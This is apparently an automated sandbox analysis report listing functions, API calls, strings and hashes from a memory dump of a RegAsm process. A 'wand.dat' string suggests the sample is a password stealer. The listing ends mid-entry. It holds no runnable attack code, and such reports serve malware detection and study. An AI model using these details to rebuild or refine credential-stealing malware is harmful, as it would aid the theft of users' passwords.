                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                        • String ID: Error$Error %d: %s
                                                                        • API String ID: 313946961-1552265934
                                                                        • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                        • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                        Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                        • API String ID: 3510742995-272990098
                                                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                        Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: gj
                                                                        • API String ID: 1297977491-4203073231
                                                                        • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                        • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                        Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                          • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                        • Opcode Fuzzy Hash: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                        Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                        • malloc.MSVCRT ref: 004174BD
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                        • String ID:
                                                                        • API String ID: 2903831945-0
                                                                        • Opcode ID: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                        • Opcode Fuzzy Hash: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                        Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                        • String ID:
                                                                        • API String ID: 4247780290-0
                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                        Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                        • memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                        • String ID:
                                                                        • API String ID: 1471605966-0
                                                                        • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                        • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                        Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                        • String ID: \StringFileInfo\
                                                                        • API String ID: 102104167-2245444037
                                                                        • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                        • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                        Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                        Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$??3@
                                                                        • String ID: g4@
                                                                        • API String ID: 3314356048-2133833424
                                                                        • Opcode ID: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                        • Opcode Fuzzy Hash: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                        Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004100FB
                                                                        • memset.MSVCRT ref: 00410112
                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                        • String ID: </%s>
                                                                        • API String ID: 3400436232-259020660
                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                        Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D58D
                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                        • String ID: caption
                                                                        • API String ID: 1523050162-4135340389
                                                                        • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                        • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                        Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                        • String ID: MS Sans Serif
                                                                        • API String ID: 210187428-168460110
                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                        Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp
                                                                        • String ID:
                                                                        • API String ID: 3384217055-0
                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                        Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040560C
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.*$dat$wand.dat
                                                                        • API String ID: 2618321458-1828844352
                                                                        • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                        • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                        Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00412057
                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                        • String ID:
                                                                        • API String ID: 3550944819-0
                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                        Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                        • memcpy.MSVCRT ref: 0040A94F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 3023356884-0
                                                                        • Opcode ID: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                        • Opcode Fuzzy Hash: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                        Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                        • memcpy.MSVCRT ref: 0040B248
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 3023356884-0
                                                                        • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                        • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                        Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: @
                                                                        • API String ID: 3510742995-2766056989
                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                        Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                        • memcpy.MSVCRT ref: 0040B159
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocstrlen
                                                                        • String ID:
                                                                        • API String ID: 1171893557-0
                                                                        • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                        • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                        Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004144E7
                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                        • memset.MSVCRT ref: 0041451A
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1127616056-0
                                                                        • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
